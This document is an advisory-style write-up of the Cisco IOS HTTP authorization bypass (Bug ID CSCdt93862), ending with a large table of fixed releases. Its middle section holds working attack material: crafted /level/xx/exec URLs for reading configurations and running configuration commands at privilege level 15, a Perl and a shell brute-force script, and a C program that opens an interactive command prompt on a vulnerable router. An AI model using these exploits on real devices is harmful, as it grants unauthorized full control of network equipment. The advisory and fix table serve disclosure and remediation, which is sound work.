COMMAND

    CISCO

SYSTEMS AFFECTED

    Cisco IOS 11.3 and later

PROBLEM

    Following  is  based  on  a  Cisco  Security  Advisory.  When HTTP
    server is enabled and local authorization is used, it is possible,
    under some circumstances, to bypass the authentication and execute
    any command on the device. It that case, the user will be able  to
    exercise complete control  over the device.  All commands will  be
    executed with the highest privilege (level 15).

    All releases of Cisco IOS software, starting with the release 11.3
    and  later,  are  vulnerable.   Virtually,  all  mainstream  Cisco
    routers  and  switches  running  Cisco  IOS  are  affected by this
    vulnerability.

    By sending a crafted URL  it is possible to bypass  authentication
    and execute any command on  the router at level 15  (enable level,
    the most privileged level).  This will happen only if the user  is
    using a local database for authentication (usernames and passwords
    are defined  on the  device itself).   The same  URL will  not  be
    effective against  every Cisco  IOS software  release and hardware
    combination.   However, there  are only  84 different combinations
    to try, so it would be easy for an attacker to test them all in  a
    short period of time.  The URL in question folows this format:

        http://<device_addres>/level/xx/exec/....

    Where xx is  a number between  16 and 99.   This vulnerability  is
    documented as Cisco Bug ID CSCdt93862.

    An attacker  can exercise  complete control  over the  device.  By
    exploiting this  vulnerability, the  attacker can  see and  change
    configuration of the device.

    You can also run configuration commands:

        http://169.254.0.15/level/42/configure/-/banner/motd/LINE

    Start  with  http://169.254.0.16/level/xx/configure  and  go  from
    there.  A malicious user could use:

        http://169.254.0.15/level/42/exec/show%20conf

    to get, for instance, vty 0 4 acl information and then add an  ACL
    for his/her source ip.

    This vulnerability has been reported to us independently by  David
    Hyams, Ernst & Young, Switzerland and by Bashis.

    Tamer Sahin wrote MS based exploit cisco ios http vulnerability:

        http://www.tamersahin.net/downloads/cisco_ios.zip

    Ertan Kurt provided a working code below:

    #!/usr/bin/perl
    # modified roelof's uni.pl
    # to check cisco ios http auth bug
    # cronos <cronos@olympos.org>
    use Socket;
    print "enter IP (x.x.x.x): ";
    $host= <STDIN>;
    chop($host);
    $i=16;
    $port=80;
    $target = inet_aton($host);
    $flag=0;
    LINE: while ($i<100) {
    # ------------- Sendraw - thanx RFP rfp@wiretrip.net
    my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
    foreach $line (@results){
            $line=~ tr/A-Z/a-z/;
            if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
            if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
    }
            if ($flag==1){print "Not Vulnerable with $i\n\r";}
                    else {print "$line Vulnerable with $i\n\r"; last LINE; }
            $i++;
    sub sendraw {
            my ($pstr)=@_;
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,$port,$target)){
                    my @in;
                    select(S);      $|=1;   print $pstr;
                    while(<S>){ push @in, $_;}
                    select(STDOUT); close(S); return @in;
            } else { die("Can't connect...\n"); }
    }
    }

    This is a little cleaner than that perl script above:

    #!/bin/sh
    #=============================================================================
    # $Id: ios-http-auth.sh,v 1.1 2001/06/29 00:59:44 root Exp root $
    #
    # Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
    #=============================================================================
    TARGET=192.168.10.20
    FETCH="/usr/bin/fetch"

    LEVEL=16                  # Start Level
    EXPLOITABLE=0             # Counter

    while [ $LEVEL -lt 100 ]; do
        CMD="${FETCH} http://${TARGET}/level/${LEVEL}/exec/show/config"
        echo; echo ${CMD}
        if (${CMD}) then
            EXPLOITABLE=`expr ${EXPLOITABLE} + 1`
        fi
        LEVEL=`expr $LEVEL + 1`
    done;

    echo; echo All done
    echo "${EXPLOITABLE} exploitable levels"

    Eliel Sardanons added following:

    /* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
     * to compile:
     * bash# gcc -o cisco cisco.c
     */
    
    #include <stdio.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    
    #define HTTP_PORT 80
    #define PROMPT "\ncisco$ "
    
    int usage (char *progname) {
	    printf ("Usage:\n\t%s server\n", progname);
	    exit(-1);
    }
    
    int main (int argc, char *argv[]) {
	    struct hostent *he;
	    struct sockaddr_in sin;
	    int sck, i=0, number=0;
	    char command[256], buffer[512];
	    if (argc < 2)
		    usage(argv[0]);
	    if ((he = gethostbyname(argv[1])) == NULL) {
		    perror("host()");
		    exit(-1);
	    }
	    sin.sin_family = AF_INET;
	    sin.sin_port = htons(HTTP_PORT);
	    sin.sin_addr = *((struct in_addr *)he->h_addr);
	    printf ("Checking Numbers /level/xx/exec\n");
	    i=15;
	    while (1) {
		    i++;
		    if (i > 99) {
			    printf ("Server not vulnerable\n");
			    exit(-1);
		    }
		    if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
			          perror("socket()");
			          exit(-1);
		    }
		    if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
			    perror ("connect()");
			    exit(-1);
		    }
		    sprintf (buffer, "GET /level/%d/exec HTTP/1.0\r\n\r\n");
		    write (sck, buffer, strlen(buffer));
		    memset (buffer, 0, sizeof(buffer));
		    read (sck, buffer, sizeof(buffer));
		    if ((strstr(buffer, "Unauthorized")) == 0 && strlen(buffer) > 5)
			    break;
	    }
	    number = i;
	    printf ("Found: %d\n", number);
	    while (1) {
		    if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
			    perror("socket()");
			    exit(-1);
		    }
		    if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
			    perror ("connect()");
			    exit(-1);
		    }
		    printf (PROMPT);
		    fgets (command, 256, stdin);
		    if (strlen(command) == 1)
			    break;
		    for (i=0;i<strlen(command);i++) {
			    if (command[i] == ' ')
				    command[i] = '/';
		    }
		    snprintf (buffer, sizeof(buffer),
							    "GET /level/%d/exec/%s HTTP/1.0\r\n\r\n", number, command);
		    write (sck, buffer, strlen(buffer));
		    memset (buffer, 0, sizeof(buffer));
		    while ((read (sck, buffer, sizeof(buffer))) != 0) {
			    if ((strstr(buffer, "CR</A>")) != 0) {
				    printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
				    memset (buffer, 0, sizeof(buffer));
				    break;
			    } else if ((strstr(buffer, "Unauthorized")) != 0) {
				    printf ("Server not vulnerable\n");
				    exit(-1);
			    } else {
				    printf ("%s", buffer);
				    memset (buffer, 0, sizeof(buffer));
			    }
		     }
	    }
	    printf ("Thanks...\n");
	    exit(0);
    }

SOLUTION

    The workaround for  this vulnerability is  to disable HTTP  server
    on the router or to use Terminal Access Controller Access  Control
    System  (TACACS+)  or  Radius  for  authentication.   Fixes are in
    table.

    +---------------+----------------+-----------------------------------------+
    |               | Description of |                                         |
    |    Train      |    Image or    |      Availability of Fixed Releases*    |
    |               |    Platform    |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |11.0-based Releases and Earlier |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Multiple        |                                         |
    |     10.3      |releases and    |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Multiple        |                                         |
    |     11.0      |releases and    |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |      11.1-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |                                         |
    |     11.1      |for all         |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |      11.2-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |End of Engineering                       |
    |     11.2      |for all         +-----------------------------------------+
    |               |platforms       |Not affected                             |
    +---------------+----------------+-------------+------------+--------------+
    |      11.3-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |End of Engineering                       |
    |     11.3      |for all         +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |ED for dial     |                                         |
    |               |platforms and   |Not Scheduled                            |
    |    11.3AA     |access servers +-----------------------------------------+
    |               |5800, 5200,     |Upgrade recommended to 12.1(9)           |
    |               |5300, 7200      |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|End of Engineering                       |
    |    11.3DA     |train for ISP   |                                         |
    |               |DSLAM 6200      +-----------------------------------------+
    |               |platform        |Upgrade recommended to 12.1DA            |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|                                         |
    |               |train for       |End of Engineering                       |
    |               |ISP/Telco/PTT   |                                         |
    |    11.3DB     |xDSL broadband  +-----------------------------------------+
    |               |concentrator    |                                         |
    |               |platform, (NRP) |Upgrade recommended to 12.1DB            |
    |               |for 6400        |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Short-lived ED  |End of Engineering                       |
    |    11.3HA     |release for ISR |                                         |
    |               |3300 (SONET/SDH +-----------------------------------------+
    |               |router)         |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |MC3810          |End of Engineering                       |
    |    11.3MA     |functionality   +-----------------------------------------+
    |               |only            |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Voice over IP,  |                                         |
    |               |media           |End of Engineering                       |
    |    11.3NA     |convergence,    +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.1(9)           |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|End of Engineering                       |
    |    11.3T      |major release,  |                                         |
    |               |feature-rich for+-----------------------------------------+
    |               |early adopters  |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |                |End of Engineering                       |
    |    11.3XA     |Introduction of +-----------------------------------------+
    |               |ubr7246 and 2600|Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |                |End of Engineering                       |
    |   11.3WA4     |LightStream 1010+-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-------------+------------+--------------+
    |      12.0-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.0      |Deployment      |             |            |12.0(18)      |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |                |Not Scheduled                            |
    |    12.0DA     |xDSL support    +-----------------------------------------+
    |               |6100, 6200      |Upgrade recommended to 12.1(7)DA2        |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|                                         |
    |               |(ED) release,   |                                         |
    |               |which delivers  |Not Scheduled                            |
    |               |support for the |                                         |
    |    12.0DB     |Cisco 6400      +-----------------------------------------+
    |               |Universal Access|                                         |
    |               |Concentrator    |                                         |
    |               |(UAC) for Node  |Upgrade recommended to 12.1(5)DB2        |
    |               |Switch Processor|                                         |
    |               |(NSP).          |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|                                         |
    |               |(ED) release,   |                                         |
    |               |which delivers  |Not Scheduled                            |
    |               |support for the |                                         |
    |    12.0DC     |Cisco 6400      +-----------------------------------------+
    |               |Universal Access|                                         |
    |               |Concentrator    |                                         |
    |               |(UAC) for Node  |Upgrade recommended to 12.1DC            |
    |               |Switch Processor|                                         |
    |               |(NSP).          |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |12.0(18)S     |
    |    12.0S      |support GSR,    |             |            |Available     |
    |               |RSP, c7200      |             |            |2001-July     |
    +---------------+----------------+-------------+------------+--------------+
    |    12.0SC     |Cable/broadband |             |            |12.0(16)SC    |
    |               |ISP ubr7200     |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.0SL     |10000 ESR c10k  |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |software        |             |            |              |
    |               |Release12.0ST is|             |            |              |
    |               |an early        |             |            |              |
    |               |deployment (ED) |             |            |              |
    |               |release for the |             |            |              |
    |    12.0ST     |Cisco 7200,     |             |            |              |
    |               |7500/7000RSP and|             |            |              |
    |               |12000 (GSR)     |             |            |              |
    |               |series routers  |             |            |              |
    |               |for Service     |             |            |              |
    |               |Providers       |             |            |              |
    |               |(ISPs).         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early           |                                         |
    |               |Deployment(ED)  |Not Scheduled                            |
    |    12.0T      |VPN, Distributed|                                         |
    |               |Director,       +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.1(9)           |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Catalyst        |                                         |
    |               |switches        |                                         |
    |               |cat8510c,       |                                         |
    |12.0(13)W5(19c)|cat8540c, c6msm,|Not vulnerable                           |
    |               |ls1010,         |                                         |
    |               |cat8510m,       |                                         |
    |               |cat8540m        |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Catalyst        |             |            |              |
    |12.0(10)W5(18g)|switches        |             |            |12.0(18)W5(22a)
    |               |cat2948g,       |             |            |2001-August-23|
    |               |cat4232         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Catalyst        |             |            |              |
    |12.0(14)W5(20) |switches        |             |            |12.0(18)W5(22)|
    |               |cat5000ATM      |             |            |2001-August-03|
    +---------------+----------------+-------------+------------+--------------+
    |               |                |Not Scheduled                            |
    |    12.0WC     |                +-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |                |Not Scheduled                            |
    |    12.0WT     |cat4840g        +-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XA     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.0XB     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XC     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XD     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XE     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(8a)E         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XF     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XG     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XH     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XI     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XJ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |  12.0(5)XK    |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |  12.0(7)XK    |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2              |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XL     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XM     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.0(4)XM1        |
    |               |                |Availability date to be determined       |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XN     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XP     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XQ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XR     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|End of Engineering                       |
    |    12.0XS     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(8a)E         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XU     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XV     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-------------+------------+--------------+
    |      12.1-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.1      |deployment      |             |            |12.1(9)       |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1AA     |Dial support    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |              |
    |    12.1CX     |support GSR,    |             |            |              |
    |               |RSP, c7200      |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1DA     |xDSL support    |12.1(7)DA2   |            |              |
    |               |6100, 6200      |2001-Jun-18  |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |Software Release|             |            |              |
    |               |12.1(1)DB       |             |            |              |
    |    12.1DB     |supports Cisco's|             |            |              |
    |               |6400 Universal  |             |            |              |
    |               |Access          |             |            |              |
    |               |Concentrator    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |Software Release|             |            |              |
    |               |12.1(1)DC       |             |            |              |
    |    12.1DC     |supports Cisco's|             |            |              |
    |               |6400 Universal  |             |            |              |
    |               |Access          |             |            |              |
    |               |Concentrator    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |              |
    |    12.1E      |support GSR,    |             |            |12.1(8a)E     |
    |               |RSP, c7200      |             |            |2001-Jul-09   |
    +---------------+----------------+-------------+------------+--------------+
    |               |12.1EC is being |             |            |              |
    |               |offered to allow|             |            |              |
    |               |early support of|             |            |              |
    |               |new features on |             |            |              |
    |               |the uBR7200     |             |            |              |
    |    12.1EC     |platform, as    |             |12.1(6.5)EC3|              |
    |               |well as future  |             |            |              |
    |               |support for new |             |            |              |
    |               |Universal       |             |            |              |
    |               |Broadband Router|             |            |              |
    |               |headend         |             |            |              |
    |               |platforms.      |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1EX     |Catalyst 6000   |             |            |12.1(8a)E     |
    |               |support         |             |            |2001-Jul-09   |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cat8510c,       |             |            |              |
    |    12.1EY     |Cat8510m,       |             |            |12.1(6)EY     |
    |               |Cat8540c,       |             |            |              |
    |               |Cat8540m, LS1010|             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1EZ     |(ED) special    |12.1(6)EZ1   |            |              |
    |               |image           |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early           |                                         |
    |               |Deployment(ED)  |Not Scheduled                            |
    |    12.1T      |VPN, Distributed|                                         |
    |               |Director,       +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.2(1b)          |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XA     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XB     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XC     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XD     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XE     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XF     |(ED) 811 and    |12.1(2)XF4   |            |              |
    |               |813 (c800       |2001-July-09 |            |              |
    |               |images)         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XG     |(ED) 800, 805,  |12.1(5)XG5   |            |              |
    |               |820, and 1600   |2001-July-09 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XH     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XI     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XJ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(5)YB4        |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XK     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XL     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XM     |early deployment|12.1(4)XM4   |            |              |
    |               |release         |2001-June-27 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XP     |(ED) 1700 and   |12.1(3)XP4   |            |              |
    |               |SOHO            |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.1XQ     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XR     |early deployment|12.1(5)XR2   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XS     |early deployment|             |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XT     |(ED) 1700       |12.1(3)XT3   |            |              |
    |               |series          |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XU     |(ED) limited    |12.1(5)XU1   |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XV     |early deployment|12.1(5)XV3   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.1XW     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.2DD            |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XX     |early deployment|             |            |12.1(6)EZ     |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XY     |early deployment|12.1(5)XY6   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XZ     |early deployment|12.1(5)XZ4   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YA     |early deployment|             |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YB     |early deployment|12.1(5)YB4   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YC     |early deployment|12.1(5)YC1   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YD     |early deployment|12.1(5)YD2   |            |              |
    |               |release         |2001-June-25 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YF     |early deployment|12.1(5)YF2   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |      12.2-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.2      |deployment      |12.2(1b)     |12.2(1.1)   |12.2(3)       |
    |               |release for all |             |            |2001-August   |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |    12.2T      |deployment      |             |12.2(2.2)T  |              |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.2XA     |SPLOB           |             |            |12.2(2)XA     |
    |               |                |             |            |2001-July-02  |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XD     |early deployment|12.2(1)XD1   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XE     |early deployment|             |            |12.2(1)XE     |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XH     |early deployment|             |            |12.2(1)XH     |
    |               |release         |             |            |2001-June-25  |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XQ     |early deployment|             |            |12.2(1)XQ     |
    |               |release         |             |            |2001-June-23  |
    +---------------+----------------+-------------+------------+--------------+
    |                                   Notes                                  |
    +--------------------------------------------------------------------------+
    | * All dates are estimated and subject to change.                         |
    |                                                                          |
    | ** Interim releases are subjected to less rigorous testing than regular  |
    | maintenance releases, and may have serious bugs.                         |
    +--------------------------------------------------------------------------+